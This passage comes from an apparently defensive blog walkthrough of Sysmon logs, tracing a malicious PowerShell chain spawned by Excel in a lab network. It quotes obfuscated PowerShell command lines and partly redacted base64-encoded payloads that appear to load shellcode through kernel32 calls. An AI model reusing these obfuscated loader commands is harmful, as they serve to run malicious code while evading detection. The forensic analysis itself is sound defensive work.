I'm all ears. 
I've dabbled in reversing, but my knowledge in this area is not what I want it to be.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Back to Sysmon says</font></span></h2><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Recall our process before we took the detour to analyze our malicious PowerShells. Sysmon captured all of that. We left off reviewing events in the Sysmon log. Let's return to that. We saw PowerShell building an obfuscated set of variables that were going to be handed to another PowerShell instance as an encoded command, which we just spent some time picking apart. 
Sysmon picks up the execution of that PowerShell process as a child of the first PowerShell process, the grandchild of Excel.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 
normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:36.723</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1236</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: 
rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: PowerShell.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec 
JABpAHMAPQAnACQASwB1AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcg...NgA0AFwAJABQAE0AJAB1AG0AXAB2ADEALgAwAFwAJAB1AG0AIgA7ACQASQB0AFgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQASQB0AFgAJwApAHsAJAB1AG0APQAgACQAawBYAHQAfQA7ACQAdgBGAD0AIgAgACQAdQBtACAAUwB3AGYAWAAgACQAcQB6ACIAOwAkAHYARgA9ACQAdgBGAC4AcgBlAHAAbABhAGMAZQAoACIAUwB3AGYAWAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHYARgA=</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</font></span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 1604</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; 
font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above I've redacted some portions to save space. Note the </font><font face="courier">ParentCommandLine</font><font face="inherit"> near the bottom is the one we reviewed previously, while the </font><font face="courier">CommandLine</font><font face="inherit"> carries, in full, the payload the attacker tried to hide or obfuscate to circumvent detection: base64 is encoding, not encryption, so a single decode step recovers the script exactly as this PowerShell instance ran it. Also compare </font><font face="courier">Image</font><font face="inherit"> with </font><font face="courier">CommandLine</font><font face="inherit">: the command line names </font><font face="courier">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</font><font face="inherit">, but the image that actually ran is </font><font face="courier">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font><font face="inherit">, because the parent is a 32-bit process and WOW64 file system redirection maps System32 to SysWOW64 for it. That is a normal artifact rather than tampering, but it is why </font><font face="courier">Image</font><font face="inherit"> (and the hashes) rather than </font><font face="courier">CommandLine</font><font face="inherit"> should be trusted for the identity of the binary. The above PowerShell instance parents the third one, partially shown below.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span 
class="Apple-converted-space"> </span>7/19/2020 8:03:36 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: 
monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:36.942</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: 
{fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: PowerShell.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGE...</span><span style="font-variant-ligatures: no-common-ligatures;">LAAgAFsAUgBlAGYAXQAkAFQAYQBvACkAOwAkAFoAdQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZABWACwAMAAsADAALAAwACkAOwA=</span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 
1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 1236</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJw...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; 
text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again, I've redacted the encoded commands to save space, but we've already reviewed them in some detail, if not enough. Note that </font><font face="courier">ProcessId 2752</font><font face="inherit"> is our third PowerShell instance.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Recall the discussion of the </font><font 
face="courier">Add-Type</font><font face="inherit"> cmdlet causing </font><font face="courier">csc.exe</font><font face="inherit"> and </font><font face="courier">cvtres.exe</font><font face="inherit"> to run. We can see that in the Sysmon logs.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 